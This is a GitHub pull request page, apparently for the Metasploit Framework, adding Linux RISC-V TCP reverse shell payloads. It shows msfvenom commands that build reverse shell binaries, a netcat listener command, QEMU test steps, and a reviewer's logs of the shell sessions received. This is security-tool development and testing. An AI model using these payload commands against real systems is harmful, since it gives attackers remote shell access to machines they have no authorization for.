Skip to content

Add Linux RISC-V 32-bit/64-bit TCP reverse shell payloads #20712

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Add Linux RISC-V 32-bit/64-bit TCP reverse shell payloads #20712

wants to merge 1 commit into from
+330 −0

Conversation

@bcoles
Copy link
Contributor

@bcoles bcoles commented Nov 20, 2025
edited
Loading

Add Linux RISC-V 32-bit/64-bit TCP reverse shell payloads.

Source

Verification

Tested with QEMU. For other test environments, see #19518 (comment).

Generate a Linux Command Shell, Reverse TCP Inline payload (with optional NOP sled):

./msfvenom -n 100 -f elf -p linux/riscv64le/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 > rev.elf

./msfvenom -n 100 -f elf -p linux/riscv32le/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 > rev.elf

Start a netcat listener nc -lvp 1337 (or use exploit/multi/handler).

Execute the payload with QEMU:

$ /home/user/qemu/build/qemu-riscv64 -strace ./rev.elf

$ /home/user/qemu/build/qemu-riscv32 -strace ./rev.elf

Note the payload was executed successfully and a reverse shell was received :)

@bcoles bcoles force-pushed the linux-riscv-tcp-reverse-shell branch from 003bbc9 to dffbcd6 Compare November 23, 2025 04:47
@bcoles bcoles changed the title Add Linux RISC-V 64-bit TCP reverse shell payload Add Linux RISC-V 32-bit/64-bit TCP reverse shell payloads Nov 23, 2025
@bcoles bcoles force-pushed the linux-riscv-tcp-reverse-shell branch from dffbcd6 to bb5ea49 Compare November 23, 2025 05:09
@dledda-r7 dledda-r7 self-assigned this Nov 24, 2025
dledda-r7
dledda-r7 reviewed Nov 24, 2025
View reviewed changes
modules/payloads/singles/linux/riscv64le/shell_reverse_tcp.rb
Copy link
Contributor

@dledda-r7 dledda-r7 Nov 24, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more. 

msf payload(linux/riscv64le/shell_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),102(lxd)
ls
chmod_64.elf
notreadme
revshell_riscv64.elf
echo ":)"
:)
uname -a
Linux ubuntu 6.14.0-13-generic #13.2-Ubuntu SMP PREEMPT_DYNAMIC Sun Apr  6 05:26:54 UTC 2025 riscv64 riscv64 riscv64 GNU/Linux

modules/payloads/singles/linux/riscv32le/shell_reverse_tcp.rb
Copy link
Contributor

@dledda-r7 dledda-r7 Nov 24, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more. 

msf payload(linux/riscv32le/shell_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...


Shell Banner:
= 2
293092 dup3(3,1,0) = 1
293092 dup3(3,0,0) = 0
293092 execve("/bin/sh",{)
-----
          
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),106(bluetooth),113(scanner),136(wireshark),137(kaboxer),141(docker)
ls
a.out
chmod_32.elf
chmod_64.elf
metsrv.exe
metsrv.mipsel
metsrv.og.mipsel
metsrv.x64.exe
mips_sc.s
notreadme
payload.aarch64.exe
revshell_riscv32.elf
revshell_riscv64.elf
uname -a
Linux kali 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64 GNU/Linux

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@dledda-r7 dledda-r7 dledda-r7 left review comments

At least 1 approving review is required to merge this pull request.

Assignees

@dledda-r7 dledda-r7

Labels

payload riscv RISC-V

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@bcoles @dledda-r7